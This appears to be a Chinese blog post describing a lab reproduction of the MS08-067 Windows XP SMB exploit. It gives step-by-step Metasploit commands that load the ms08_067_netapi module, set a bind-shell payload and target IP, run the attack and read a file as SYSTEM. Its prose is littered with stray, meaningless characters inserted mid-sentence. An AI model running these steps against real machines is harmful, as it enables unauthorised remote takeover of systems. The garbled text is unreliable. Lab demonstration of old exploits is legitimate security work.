時間:2022-03-10
由于工作需要唇撬,此次的復現(xiàn)只是用于工作中的安全演示,目的是復現(xiàn)攻擊成功即可展融。
一窖认、環(huán)境準備
1、需要準備英文的windows xp 環(huán)境告希。
中文版會復現(xiàn)失敗扑浸,具體問題沒有分析過。
鏈接:https://pan.baidu.com/s/1iN6hxbAlRHCaxPXaBiB4_g
提取碼:y8mj
2燕偶、攻擊工具使用的是metasploit喝噪,kali 自帶。
二指么、復現(xiàn)時存在的問題
1酝惧、安裝完xp之后,我自己已經(jīng)復現(xiàn)了一次伯诬,發(fā)現(xiàn)拿到的system沒有相關(guān)命令晚唇,可能是這個新系統(tǒng)沒有添加到環(huán)境中,之后建立了一個文檔進行讀取盗似,也可直觀的看到結(jié)果哩陕。其他就沒遇到什么問題了。
三、復現(xiàn)演示
1悍及、虛擬機準備一下xp葵礼,建立一個test的文檔,查看一下靶機 IP并鸵,靶機建立完成
2鸳粉、使用metasploit 進行攻擊
1)、msfconsole #進入metasploit
2)园担、search ms08-067 #搜索相關(guān)exp
3)届谈、use exploit/windows/smb/ms08_067_netapi #使用這個exp
4)、show payloads #搜索相關(guān)payload弯汰,能讓攻擊后建立連接
5)艰山、set payload generic/shell_bind_tcp #我使用的是這個
6)、set RHOST 192.168.154.144 #設(shè)置靶機IP咏闪,讓它攻擊這個IP曙搬,端口默認是445,這個就不需要設(shè)置了
7)鸽嫂、show options #可以用這個命令查看是否把相關(guān)配置設(shè)置全了
8)纵装、run 或 exploit #進行攻擊,兩個命令都可以
9)据某、type test.txt #之后攻擊成功了橡娄,使用windows命令 就可以去相關(guān)路徑下查看那個 test 文檔了
演示圖: